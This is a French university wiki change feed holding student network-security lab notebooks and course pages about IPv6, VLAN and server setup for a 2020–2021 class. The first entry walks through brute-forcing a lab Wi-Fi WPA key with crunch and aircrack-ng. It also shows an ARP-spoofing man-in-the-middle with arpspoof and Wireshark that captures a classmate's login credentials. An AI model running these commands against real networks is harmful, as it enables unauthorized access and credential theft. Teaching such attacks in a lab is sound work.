On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Config_Postfix_mirage.png&amp;diff=53929</id>
		<title>Fichier:Config Postfix mirage.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Config_Postfix_mirage.png&amp;diff=53929"/>
				<updated>2020-11-20T08:10:59Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=53927</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=53927"/>
				<updated>2020-11-20T07:40:31Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* IP des VMs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Objectif du projet ==&lt;br /&gt;
&lt;br /&gt;
La promotion 2020-2021 IMA2A5 réalise un système réseau répondant aux protocoles IPV6 et assurant une redondance matérielle. &lt;br /&gt;
La redondance matérielle se traduit par la mise en place de deux sites qui sont connectés et fonctionnent ensemble. Mais, si un des deux tombent en panne, le second récupère tout le travail et maintient le réseau.&lt;br /&gt;
&lt;br /&gt;
D'un point de vue système, chacun a une machine virtuelle Xen assurant des services. Pour finir, en utilisant nos connaissances, un réseau Wifi et un site web sécurisés seront installés.&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Description des connexions ==&lt;br /&gt;
Pour ce TP nous avons à notre disposition :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Désignation !! Référence !! Autre !! Connexion&lt;br /&gt;
|-&lt;br /&gt;
|Routeur&lt;br /&gt;
|6509&lt;br /&gt;
|Equipé de deux Hyperviseurs SUP720 avec x02 interfaces Giga et x02 TenGiga&lt;br /&gt;
|Connecté au réseau de Polytech pour accéder à internet via RENATER&lt;br /&gt;
|-&lt;br /&gt;
|Commutateur Cisco&lt;br /&gt;
|3560 E&lt;br /&gt;
|Equipement utilisé comme simple commutateur même s'il peut faire office de routeur&lt;br /&gt;
|Connecté au réseau de Polytech via la prise SR52-3/K16 &lt;br /&gt;
|-&lt;br /&gt;
|Commutateur Cisco&lt;br /&gt;
|ISR 4331&lt;br /&gt;
|Utilisé comme portail dérobé en cas de défaillance du 3560E&lt;br /&gt;
|Connecté au SDSL connecter via la prise SR52-3/L04,&lt;br /&gt;
|-&lt;br /&gt;
|Serveur de virtualisation&lt;br /&gt;
|R540&lt;br /&gt;
|Abrite les machines virtuelles&lt;br /&gt;
|Relié au 6509 par liaison fibre LC/LC et au 3560-E par câble Ethernet&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
NB: Nous avions eu à utiliser des modules SFP Giga et TenGiga Cisco de type LC ou SC.&lt;br /&gt;
Pour répondre à l’objectif du TP : la redondance matérielle, nous avions entamé le raccordement des équipements. Cependant, cela a entraîné une utilisation abusive des ressources que nous disposions : 6 liaisons fibres pour nos connexions alors que 3 nous étaient allouées, une partie est réservée aux IMA5SC.&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous nous sommes occupé de l'aspect Hardware du projet. Le but étant de connecter les différents éléments mis à disposition (Routeur 6509, Serveur de virtualisation R540 et commutateur 3560-E &amp;amp; ISR 4331) entre eux. Pour cela, nous nous sommes servis de la fibre mise à dispostion. En effet, le routeur 6509, composé des deux cartes de supervision doit être connectée au R540, au 3560-E ainsi qu'à l'ISR 4331 via une liaison fibre. Initialement, nous comptions connecter chaque carte de supervision aux autres éléments grâce à la fibre mis à disposition. Cela aurait donné le schéma ci-dessous : &lt;br /&gt;
&lt;br /&gt;
=== Architecture matérielle Optimale ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
=== Architecture matérielle Réelle ===&lt;br /&gt;
&lt;br /&gt;
Ainsi, grâce à cette configuration, il y aurait eu de la redondance entre les cartes de supervision et les autres éléments. De ce fait, si une des cartes de supervision était défectueuse, la seconde pourrait toujours communiquer avec le reste du système. Cependant, afin de se partager le matériel avec la seconde classe, nous ne pouvions utiliser que la moitié de la fibre mise à disposition. De ce fait, nous avons abouti à la configuration suivante : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
=== Architecture Réseau ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Architecture-Reseau-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan1 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom VM&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.161&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.162&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.163&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.164&lt;br /&gt;
|Rafale&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.165&lt;br /&gt;
|Concorde&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.166&lt;br /&gt;
|Blackbird&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.167&lt;br /&gt;
|Falcon&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|Mirage&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.169&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.170&lt;br /&gt;
|NightHawk&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.171&lt;br /&gt;
|hawker&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.172&lt;br /&gt;
|Boeing&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.173/28&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.240&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan130 ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|192.168.222.2&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|192.168.222.1&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.248&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table des vlan ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom !! Vlan &lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|Vlan3&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|Vlan4&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|Vlan5&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|Vlan6&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|Vlan8&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|Vlan9&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|Vlan10&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|Vlan11&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Administration&lt;br /&gt;
|Vlan1&lt;br /&gt;
|10.60.0.0/24&lt;br /&gt;
|&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|Vlan2&lt;br /&gt;
|193.48.57.160/28&lt;br /&gt;
|2001:660:4401:60a2::0/64&lt;br /&gt;
|193.48.57.161&lt;br /&gt;
|193.48.57.162&lt;br /&gt;
|193.48.57.163&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|Vlan7&lt;br /&gt;
|193.48.57.168/24&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|Vlan10&lt;br /&gt;
|10.60.7.0/24&lt;br /&gt;
|2001:660:4401:60aa::0/64&lt;br /&gt;
|10.60.7.1&lt;br /&gt;
|10.60.7.2&lt;br /&gt;
|10.60.7.3&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|Vlan11&lt;br /&gt;
|X&lt;br /&gt;
|2001:660:4401:60a2::4/64&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|mirage&lt;br /&gt;
|193.48.57.168/24&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problématique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existence d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la première carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxième carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérification de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;br /&gt;
&lt;br /&gt;
== Configuration machine Xen sur Capbreton ==&lt;br /&gt;
&lt;br /&gt;
- Connexion de l'écran, clavier, souris sur le serveur &lt;br /&gt;
- Commande &amp;quot;lbslk&amp;quot; permettant de voir les partitions sur la machine&lt;br /&gt;
    Il y a 2 disques de 500go qui forme un volume répartie de la façon suivante : 900Go pour Xen et 100Go pour le système.&lt;br /&gt;
    Il y a 1 disque SDA avec 800go de libre.&lt;br /&gt;
    Deux disques plus lent sont utilisé pour LVM.&lt;br /&gt;
- On souhaite déplacer les disques présent dans l'ancien serveur vers le serveur Capbreton cependant il faut s'assurer que les berceaux sont les même.&lt;br /&gt;
    Dans notre cas les berceaux ne sont pas les mêmes nous n'avons pas pu les insérer&lt;br /&gt;
&lt;br /&gt;
Concernant le brigde, nous avons vu dans /etc/network/interfaces &amp;quot;brigde_ports eth1 eth7&amp;quot;. Nous devons connecter eth1 et eth7. Pour connaître où sont les interfaces sur le serveur nous avons utilisé la commande:&lt;br /&gt;
    ethtool -p eth7&lt;br /&gt;
    ethtool -p eth1&lt;br /&gt;
&lt;br /&gt;
On a pu constater que eth7 correspond à la connexion en fibre optique et eth1 est la connexion cuivre&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=53926</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=53926"/>
				<updated>2020-11-20T07:40:19Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* IP des VMs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Objectif du projet ==&lt;br /&gt;
&lt;br /&gt;
La promotion 2020-2021 IMA2A5 réalise un système réseau répondant aux protocoles IPV6 et assurant une redondance matérielle. &lt;br /&gt;
La redondance matérielle se traduit par la mise en place de deux sites qui sont connectés et fonctionnent ensemble. Mais, si un des deux tombent en panne, le second récupère tout le travail et maintient le réseau.&lt;br /&gt;
&lt;br /&gt;
D'un point de vue système, chacun a une machine virtuelle Xen assurant des services. Pour finir, en utilisant nos connaissances, un réseau Wifi et un site web sécurisés seront installés.&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
